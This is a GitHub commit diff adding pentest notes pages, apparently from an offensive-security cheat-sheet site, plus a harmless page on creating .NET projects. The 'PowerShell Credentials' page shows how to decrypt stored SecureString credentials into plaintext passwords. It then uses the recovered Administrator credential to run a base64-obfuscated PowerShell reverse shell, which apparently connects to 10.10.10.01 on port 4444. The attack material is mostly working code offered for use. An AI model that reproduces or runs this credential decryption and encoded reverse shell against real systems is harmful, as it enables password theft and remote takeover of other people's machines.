-
Notifications
You must be signed in to change notification settings - Fork 125
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
9 changed files
with
127 additions
and
36 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
63 changes: 63 additions & 0 deletions
63
src/exploit/cryptography/algorithm/powershell-credentials.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,63 @@ | ||
--- | ||
title: PowerShell Credentials | ||
description: | ||
tags: | ||
- Cryptography | ||
refs: | ||
date: 2024-03-17 | ||
draft: false | ||
--- | ||
|
||
## Decrypt | ||
|
||
```powershell | ||
$EncString = "<encrypted string>" | ||
$SecureString = ConvertTo-SecureString $EncString | ||
$Credential = New-Object System.Management.Automation.PSCredential -ArgumentList "username",$SecureString | ||
# Store the decrypted passsword to `$password` variable. | ||
$password = echo $Credential.GetNetworkCredential().password | ||
``` | ||
|
||
### Login with Credential | ||
|
||
After decrypting, we can use the credential for login another user with reverse shell. | ||
|
||
```powershell | ||
$username = "Administrator" | ||
$SecurePassword = ConvertTo-SecureString $password -AsPlainText -Force | ||
$credential = New-Object System.Management.Automation.PSCredential ($username, $securePassword) | ||
# Invoke reverse shell with credential | ||
Invoke-Command -ComputerName localhost -Credential $credential -ScriptBlock {powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMAAxACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==} | ||
``` | ||
|
||
<br /> | ||
|
||
## Encrypt | ||
|
||
Reference: https://learn.microsoft.com/ja-jp/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.3 | ||
|
||
```powershell | ||
# Generate a secure string (input a plain text in prompt) | ||
$secure = Read-Host -AsSecureString | ||
# Store a key | ||
$key = (1..16) | ||
# Generate an encrypted string from the secure string | ||
$encrypted = ConvertFrom-SecureString -SecureString $secure | ||
# using key | ||
$encrypted = ConvertFrom-SecureString -SecureString $secure -Key $key | ||
echo $encrypted | ||
# Convert an encrypted string to a secure string | ||
$secure2 = ConvertTo-SecureString -String $encrypted | ||
# using key | ||
$secure2 = ConvertTo-SecureString -String $encrypted -Key $key | ||
echo $secure2 | ||
# Reveal user password | ||
$userpass = (New-Object pscredential 0, $encrypted).GetNetworkCredential().Password | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
category2: dotnet |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
--- | ||
title: .NET | ||
description: .NET is an application development environment. | ||
tags: | ||
- Windows | ||
refs: | ||
date: 2024-03-17 | ||
draft: false | ||
--- | ||
|
||
## Create a .NET Project from Command Line | ||
|
||
```bash | ||
# Create a new solution file | ||
# -n: The name for the output being created | ||
dotnet new sln -n test | ||
|
||
# Create a new .NET project. | ||
# console: Use a template for creating a console application. | ||
dotnet new console -n test | ||
|
||
# Add the project to a solution file. | ||
dotnet sln add test/test.csproj | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters